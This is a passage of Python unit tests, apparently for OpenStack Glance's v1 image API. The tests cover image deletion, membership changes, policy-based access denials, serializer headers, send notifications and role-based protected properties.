def test_show_image_basic(self):
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(res.content_type, 'application/octet-stream')
self.assertEqual('chunk00000remainder', res.body)
def test_show_non_exists_image(self):
req = webob.Request.blank("/images/%s" % _gen_uuid())
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_show_image_unauthorized(self):
rules = {"get_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
def test_show_image_unauthorized_download(self):
rules = {"download_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
def test_delete_image(self):
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.body, '')
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404,
res.body)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_non_exists_image(self):
req = webob.Request.blank("/images/%s" % _gen_uuid())
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_delete_not_allowed(self):
# Verify we can get the image data
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.headers['X-Auth-Token'] = 'user:tenant:'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 19)
# Verify we cannot delete the image
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
# Verify the image data is still there
req.method = 'GET'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 19)
def test_delete_queued_image(self):
"""Delete an image in a queued state
Bug #747799 demonstrated that trying to DELETE an image
that had had its save process killed manually results in failure
because the location attribute is None.
Bug #1048851 demonstrated that the status was not properly
being updated to 'deleted' from 'queued'.
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % res_body['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_queued_image_delayed_delete(self):
"""Delete an image in a queued state when delayed_delete is on
Bug #1048851 demonstrated that the status was not properly
being updated to 'deleted' from 'queued'.
"""
self.config(delayed_delete=True)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % res_body['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_protected_image(self):
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-name': 'fake image #3',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-protected': 'True'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_delete_image_unauthorized(self):
rules = {"delete_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_get_details_invalid_marker(self):
"""
        Tests that the /images/detail API returns a 400
when an invalid marker is provided
"""
req = webob.Request.blank('/images/detail?marker=%s' % _gen_uuid())
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_get_image_members(self):
"""
Tests members listing for existing images
"""
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['members'])
self.assertEquals(num_members, 0)
def test_get_image_members_allowed_by_policy(self):
rules = {"get_members": '@'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['members'])
self.assertEquals(num_members, 0)
def test_get_image_members_forbidden_by_policy(self):
rules = {"get_members": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_get_image_members_not_existing(self):
"""
Tests proper exception is raised if attempt to get members of
non-existing image
"""
req = webob.Request.blank('/images/%s/members' % _gen_uuid())
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_add_member(self):
"""
Tests adding image members
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
req = webob.Request.blank('/images/%s/members/test' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_get_member_images(self):
"""
Tests image listing for members
"""
req = webob.Request.blank('/shared-images/pattieblack')
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['shared_images'])
self.assertEquals(num_members, 0)
def test_replace_members(self):
"""
        Tests that a non-admin request to replace image members returns 401
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=False)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_active_image_immutable_props_for_user(self):
"""
Tests user cannot update immutable props of active image
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=False)
fixture_header_list = [{'x-image-meta-checksum': '1234'},
{'x-image-meta-size': '12345'}]
for fixture_header in fixture_header_list:
for k, v in fixture_header.iteritems():
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
orig_value = res.headers[k]
req = webob.Request.blank('/images/%s' % UUID2)
req.headers[k] = v
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
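                # strip the header prefix to recover the bare property
                # name quoted in the Forbidden error body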
prop = k[len('x-image-meta-'):]
self.assertNotEqual(res.body.find("Forbidden to modify \'%s\' "
"of active "
"image" % prop), -1)
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(orig_value, res.headers[k])
def test_props_of_active_image_mutable_for_admin(self):
"""
Tests admin can update 'immutable' props of active image
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture_header_list = [{'x-image-meta-checksum': '1234'},
{'x-image-meta-size': '12345'}]
for fixture_header in fixture_header_list:
for k, v in fixture_header.iteritems():
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
orig_value = res.headers[k]
req = webob.Request.blank('/images/%s' % UUID2)
req.headers[k] = v
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(v, res.headers[k])
def test_replace_members_non_existing_image(self):
"""
        Tests that replacing members of a non-existent image returns 404
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % _gen_uuid())
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_replace_members_bad_request(self):
"""
        Tests that replacing image members returns 400 when the body is malformed
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_replace_members_positive(self):
"""
Tests replacing image members
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
fixture = [dict(member_id='pattieblack', can_share=False)]
# Replace
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_replace_members_forbidden_by_policy(self):
rules = {"modify_member": '!'}
self.set_policy_rules(rules)
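        # '!' denies modify_member to every role, including admin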
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID1)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_replace_members_allowed_by_policy(self):
rules = {"modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID1)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
    def test_add_member_unauthorized(self):
        """
        Tests that a non-admin request to add an image member is
        rejected with 401
        """
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=False)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_add_member_non_existing_image(self):
"""
        Tests that adding a member to a non-existent image returns 404
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
test_uri = '/images/%s/members/pattieblack'
req = webob.Request.blank(test_uri % _gen_uuid())
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_add_member_positive(self):
"""
Tests adding image members
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_add_member_with_body(self):
"""
Tests adding image members
"""
fixture = dict(can_share=True)
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
req.body = json.dumps(dict(member=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
def test_add_member_forbidden_by_policy(self):
rules = {"modify_member": '!'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_add_member_allowed_by_policy(self):
rules = {"modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
def test_get_members_of_deleted_image_raises_404(self):
"""
Tests members listing for deleted image raises 404.
"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_delete_member_of_deleted_image_raises_404(self):
"""
        Tests deleting members of a deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_update_members_of_deleted_image_raises_404(self):
"""
        Tests updating members of a deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}]
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_create_member_to_deleted_image_raises_404(self):
"""
        Tests adding members to a deleted image raises 404.
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)
self.assertTrue(
'Image with identifier %s has been deleted.' % UUID2 in res.body)
def test_delete_member(self):
"""
        Tests that a non-admin request to delete an image member returns 401
"""
test_router = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router, is_admin=False)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_delete_member_on_non_existing_image(self):
"""
        Tests that deleting a member of a non-existent image returns 404
"""
test_router = router.API(self.mapper)
api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)
test_uri = '/images/%s/members/pattieblack'
req = webob.Request.blank(test_uri % _gen_uuid())
req.method = 'DELETE'
res = req.get_response(api)
self.assertEquals(res.status_int, 404)
def test_delete_non_exist_member(self):
"""
        Tests that deleting a non-existent image member returns 404
"""
test_router = router.API(self.mapper)
api = test_utils.FakeAuthMiddleware(
test_router, is_admin=True)
req = webob.Request.blank('/images/%s/members/test_user' % UUID2)
req.method = 'DELETE'
res = req.get_response(api)
self.assertEquals(res.status_int, 404)
def test_delete_image_member(self):
test_rserver = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_rserver, is_admin=True)
# Add member to image:
fixture = dict(can_share=True)
test_uri = '/images/%s/members/test_add_member_positive'
req = webob.Request.blank(test_uri % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(member=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 204)
# Delete member
test_uri = '/images/%s/members/test_add_member_positive'
req = webob.Request.blank(test_uri % UUID2)
req.headers['X-Auth-Token'] = 'test1:test1:'
req.method = 'DELETE'
req.content_type = 'application/json'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
self.assertTrue('Forbidden' in res.body)
def test_delete_member_allowed_by_policy(self):
rules = {"delete_member": '@', "modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
def test_delete_member_forbidden_by_policy(self):
rules = {"delete_member": '!', "modify_member": '@'}
self.set_policy_rules(rules)
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),
is_admin=True)
req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
class TestImageSerializer(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestImageSerializer, self).setUp()
self.receiving_user = 'fake_user'
self.receiving_tenant = 2
self.context = glance.context.RequestContext(
is_admin=True,
user=self.receiving_user,
tenant=self.receiving_tenant)
self.serializer = images.ImageSerializer()
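        # a 19-byte image split into three chunks; 'size' in the fixture
        # below must match so the send-notification payloads line up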
def image_iter():
for x in ['chunk', '678911234', '56789']:
yield x
self.FIXTURE = {
'image_iterator': image_iter(),
'image_meta': {
'id': UUID2,
'name': 'fake image #2',
'status': 'active',
'disk_format': 'vhd',
'container_format': 'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': 'PI:KEY',
'size': 19,
'owner': _gen_uuid(),
'location': "file:///tmp/glance-tests/2",
'properties': {},
}
}
def test_meta(self):
exp_headers = {'x-image-meta-id': UUID2,
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': self.FIXTURE['image_meta']['checksum'],
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
req.remote_addr = "127.0.0.1"
req.context = self.context
response = webob.Response(request=req)
self.serializer.meta(response, self.FIXTURE)
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
def test_meta_utf8(self):
# We get unicode strings from JSON, and therefore all strings in the
# metadata will actually be unicode when handled internally. But we
# want to output utf-8.
FIXTURE = {
'image_meta': {
'id': unicode(UUID2),
'name': u'fake image #2 with utf-8 éàè',
'status': u'active',
'disk_format': u'vhd',
'container_format': u'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': u'PI:KEY',
'size': 19,
'owner': unicode(_gen_uuid()),
'location': u"file:///tmp/glance-tests/2",
'properties': {
u'prop_éé': u'ça marche',
u'prop_çé': u'çé',
}
}
}
exp_headers = {'x-image-meta-id': UUID2.encode('utf-8'),
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': 'PI:KEY',
'x-image-meta-size': '19', # str, not int
'x-image-meta-name': 'fake image #2 with utf-8 éàè',
'x-image-meta-property-prop_éé': 'ça marche',
'x-image-meta-property-prop_çé': u'çé'.encode('utf-8')}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
req.remote_addr = "127.0.0.1"
req.context = self.context
response = webob.Response(request=req)
self.serializer.meta(response, FIXTURE)
self.assertNotEqual(type(FIXTURE['image_meta']['name']),
type(response.headers['x-image-meta-name']))
self.assertEqual(response.headers['x-image-meta-name'].decode('utf-8'),
FIXTURE['image_meta']['name'])
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
FIXTURE['image_meta']['properties'][u'prop_bad'] = 'çé'
self.assertRaises(UnicodeDecodeError,
self.serializer.meta, response, FIXTURE)
def test_show(self):
exp_headers = {'x-image-meta-id': UUID2,
'x-image-meta-location': 'file:///tmp/glance-tests/2',
'ETag': self.FIXTURE['image_meta']['checksum'],
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.context = self.context
response = webob.Response(request=req)
self.serializer.show(response, self.FIXTURE)
for key, value in exp_headers.iteritems():
self.assertEquals(value, response.headers[key])
self.assertEqual(response.body, 'chunk67891123456789')
def test_show_notify(self):
"""Make sure an eventlet posthook for notify_image_sent is added."""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.context = self.context
response = webob.Response(request=req)
response.request.environ['eventlet.posthooks'] = []
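        # show() should register a notify_image_sent posthook that fires
        # once the response body has been streamed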
self.serializer.show(response, self.FIXTURE)
        # just make sure the app_iter is consumed
for chunk in response.app_iter:
pass
self.assertNotEqual(response.request.environ['eventlet.posthooks'], [])
def test_image_send_notification(self):
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.remote_addr = '127.0.0.1'
req.context = self.context
image_meta = self.FIXTURE['image_meta']
called = {"notified": False}
expected_payload = {
'bytes_sent': 19,
'image_id': UUID2,
'owner_id': image_meta['owner'],
'receiver_tenant_id': self.receiving_tenant,
'receiver_user_id': self.receiving_user,
'destination_ip': '127.0.0.1',
}
def fake_info(_event_type, _payload):
self.assertEqual(_payload, expected_payload)
called['notified'] = True
self.stubs.Set(self.serializer.notifier, 'info', fake_info)
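        # actual bytes sent (19) equal the expected size, so the 'info'
        # variant of the image.send notification is emitted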
glance.api.common.image_send_notification(19, 19, image_meta, req,
self.serializer.notifier)
self.assertTrue(called['notified'])
def test_image_send_notification_error(self):
"""Ensure image.send notification is sent on error."""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.remote_addr = '127.0.0.1'
req.context = self.context
image_meta = self.FIXTURE['image_meta']
called = {"notified": False}
expected_payload = {
'bytes_sent': 17,
'image_id': UUID2,
'owner_id': image_meta['owner'],
'receiver_tenant_id': self.receiving_tenant,
'receiver_user_id': self.receiving_user,
'destination_ip': '127.0.0.1',
}
def fake_error(_event_type, _payload):
self.assertEqual(_payload, expected_payload)
called['notified'] = True
self.stubs.Set(self.serializer.notifier, 'error', fake_error)
        # expected and actually-sent byte counts differ, triggering the
        # 'error' notification
glance.api.common.image_send_notification(17, 19, image_meta, req,
self.serializer.notifier)
self.assertTrue(called['notified'])
def test_redact_location(self):
"""Ensure location redaction does not change original metadata"""
image_meta = {'size': 3, 'id': '123', 'location': 'http://localhost'}
redacted_image_meta = {'size': 3, 'id': '123'}
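        # deep-copy the input first so we can prove redact_loc does not
        # mutate it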
copy_image_meta = copy.deepcopy(image_meta)
tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)
self.assertEqual(image_meta, copy_image_meta)
self.assertEqual(tmp_image_meta, redacted_image_meta)
def test_noop_redact_location(self):
"""Check no-op location redaction does not change original metadata"""
image_meta = {'size': 3, 'id': '123'}
redacted_image_meta = {'size': 3, 'id': '123'}
copy_image_meta = copy.deepcopy(image_meta)
tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)
self.assertEqual(image_meta, copy_image_meta)
self.assertEqual(tmp_image_meta, redacted_image_meta)
self.assertEqual(image_meta, redacted_image_meta)
class TestFilterValidator(base.IsolatedUnitTest):
def test_filter_validator(self):
self.assertFalse(glance.api.v1.filters.validate('size_max', -1))
self.assertTrue(glance.api.v1.filters.validate('size_max', 1))
self.assertTrue(glance.api.v1.filters.validate('protected', 'True'))
self.assertTrue(glance.api.v1.filters.validate('protected', 'FALSE'))
self.assertFalse(glance.api.v1.filters.validate('protected', '-1'))
class TestAPIProtectedProps(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestAPIProtectedProps, self).setUp()
self.mapper = routes.Mapper()
# turn on property protections
self.set_property_protections()
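        # the protections fixture grants roles per property pattern; the
        # tests below rely on x_owner_* (member), spl_* (spl_role) and
        # admin_* (admin) rules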
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))
db_api.setup_db_env()
db_api.get_engine()
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
def tearDown(self):
"""Clear the test environment"""
super(TestAPIProtectedProps, self).tearDown()
self.destroy_fixtures()
def destroy_fixtures(self):
# Easiest to just drop the models and re-create them...
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
def _create_admin_image(self, props={}):
request = unit_test_utils.get_fake_request(path='/images')
headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-name': 'foo',
'x-image-meta-size': '0',
'x-auth-token': 'user:tenant:admin'}
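        # merge any caller-supplied (typically protected) property
        # headers into the create request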
headers.update(props)
for k, v in headers.iteritems():
request.headers[k] = v
created_image = request.get_response(self.api)
res_body = json.loads(created_image.body)['image']
image_id = res_body['id']
return image_id
def test_prop_protection_with_create_and_permitted_role(self):
"""
        As admin role, create an image and verify permitted role 'member' can
create a protected property
"""
image_id = self._create_admin_image()
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'bar')
def test_prop_protection_with_create_and_unpermitted_role(self):
"""
As admin role, create an image and verify unpermitted role
'fake_member' can *not* create a protected property
"""
image_id = self._create_admin_image()
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_member',
'x-image-meta-property-x_owner_foo': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
another_request.get_response(self.api)
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"x_owner_foo", output.body)
def test_prop_protection_with_show_and_permitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via HEAD
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
res2 = another_request.get_response(self.api)
self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_show_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
        unpermitted role 'fake_role' can *not* read that protected property via
HEAD
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
def test_prop_protection_with_get_and_permitted_role(self):
"""
As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via GET
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
res2 = another_request.get_response(self.api)
self.assertEqual(res2.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_get_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
        unpermitted role 'fake_role' can *not* read that protected property via
GET
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
def test_prop_protection_with_detail_and_permitted_role(self):
"""
